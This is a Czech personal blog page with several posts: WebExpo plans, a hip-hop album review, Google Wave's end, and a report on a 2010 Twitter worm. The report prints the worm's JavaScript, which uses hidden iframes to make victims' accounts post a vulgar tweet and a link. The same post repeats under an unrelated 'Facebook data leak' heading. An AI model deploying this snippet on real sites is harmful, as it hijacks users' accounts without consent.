Marek Hrabě programátor, webdesignér a hudebník píše…

A zase další twitter exploit

Komentáře:

Není to tak dávno, co se twitterem šířil "začerňovací" virus a dnes tu máme další. Lépe řečeno exploit. Tentokráte už zasahuje i všechny klienty (nejen web), protože se šíří formou odkazu a vulgárního tweetu. A šíří se opět lavinově. Tady jsou oba dva tweety:

Tweet 1: WTF: http://t.co/SwNMYI2

Tweet 2: i love anal sex with goats

Zkoumal jsem zdroják exploitu a zjistil jsem, že jde o zranitelnost nedávno nasazeného TweetButtonu. Pro znalé přikládám zdroják javascriptu, který toto zapříčinil. Je opravdu jednoduchý a je až do nebevolající, že vůbec může fungovat. Je to bezpečnnostní trhlina jak prase!

var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);

Rozhodně na odkaz neklikejte. Ani ze zvědavosti, protože tím okamžitě odešlte tyto tweety i z vašeho účtu. A vy snad přece nemáte rádi to, co ten tweet tvrdí :D Doufám!

Moje WebExpo 2010

Komentáře:

Letos poprvé vyrážím na WebExpo. Už se tam moc těším a doufám, že to bude legendární! Většinu času tam pravděpodobně budu s Patrikem a s lidmi z Flow Media.

Tady jsou přednášky, na které bych rád dorazil (kdoví ale, jak to nakonec bude). Pokud byste se chtěli někde potkat, třeba mi napište a můžeme se domluvit.

Nejvíce věcí je o designu a použitelnosti, kterým se poslední dobou věnuji více, než samotnému programování, takže budu mít „základnu“ v Design Hall. Rád vás uvidím a už teď se moc těším!

Ryes & Kenny Rough - Páni kluci

Komentáře:

Konečně jsem si dnes vyzvedl desku, na kterou se už moc dlouho těším – „Páni kluci“ od Kennyho a Ryese z labelu tynikdy. Byla to moje první objednávka z tohoto labelu a určitě také ne poslední! (btw: @ideafatte špatně vyplnil složenku na dobírku a tak to tam bába na poště přepisovala u okýnka. Všichni ve frontě za mnou mě proklínali :))

V první řadě jsem z obálky vyházel „nálepkový spam“ (to jsem ještě netušil, jak moc jsou cool :)) a pustil jsem se celý natěšený do desky. Má vcelku minimalistický a efektní cover, na kterém se mi líbí, že se nebáli barev. Rovněž pěkný booklet s texty a fotkami potěší.

Booklet Jedna z nálepek

Teď už konečně k obsahu CD. Obsahuje 13 skladeb, z toho v pěti se objeví hosté (Seck, Jakub Lenz, Eki, Paulie a Idea). Jedná se o dost rozmanité skladby od pomalých jako jsou třeba „Pocity“ až po našlapané „Dveře“ (to jsou mimochodem dvě mé nejoblíbenější skladby).

Původně jsem od alba moc nečekal – těšil jsem se prostě na Kennyho beaty, které žeru :D. Ryes mě ovšem dostal! Není to rozhodně žádný další rapper, ale kluk, který tu má rozhodně co říct. Texty jsou nadprůměrné oproti české scéně a je radost ho poslouchat. Tady třeba jeden rým, jehož konec mě absolutně rozsekal smíchy :)

„… nicméně CD nahraje na blogy, nechá ho stáhnout všem, nepojmenuje stopy. “ (z tracku Jejich svět)

Pokud vás alespoň trochu baví časká hip-hopová scéna, tohle musí být ve vaší poličce! Kupuj originál!

Google Wave končí

Komentáře:

Podle článku, který vyšel na oficiálním Google blogu končí Google Wave. Pokud si nevzpomínáte, co to je, ani se vám nedivím. Šlo o ambiciózní experimentální projekt Googlu pro real-time komunikaci. Každý (geek) se chtěl podívat na to, jak Google změní náš způsob komunikace a složitě scháněl pozvánky. Nakonec ale vlastně nikoho pořádně nenadchla a nikdo nebyl s to, najít kloudné využití.

Nemá smysl pokračovat v tomto projektu, ale myslím si, že by se z něj dalo vytěžit dost nápadů třeba pro další produkty Googlu (hlavně GMail a Dokumenty).

RIP.

Únik dat Facebooku

Komentáře:

A máme tu další twitter virus. Tentokráte už zasahuje i všechny klienty, protože se šíří formou odkazu a vulgárního tweetu. Šíří se opět lavinově. Tady jsou oba dva tweety:

Tweet 1: WTF: http://t.co/SwNMYI2

Tweet 2: i love anal sex with goats

Zkoumal jsem zdroják exploitu a zjistil jsem, že jde o zranitelnost nedávno nasazeného TweetButtonu. Pro znalé přikládám zdroják javascriptu, který toto zapříčinil. Je opravdu jednoduchý a je až do nebevolající, že vůbec může fungovat. Je to bezpečnnostní trhlina jak prase!

var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);

Rozhodně na odkaz neklikejte. Ani ze zvědavosti, protože okamžitě odešle tyto tweety i z vašeho účtu. A vy snad přece nemáte rádi to, co ten tweet tvrdí :D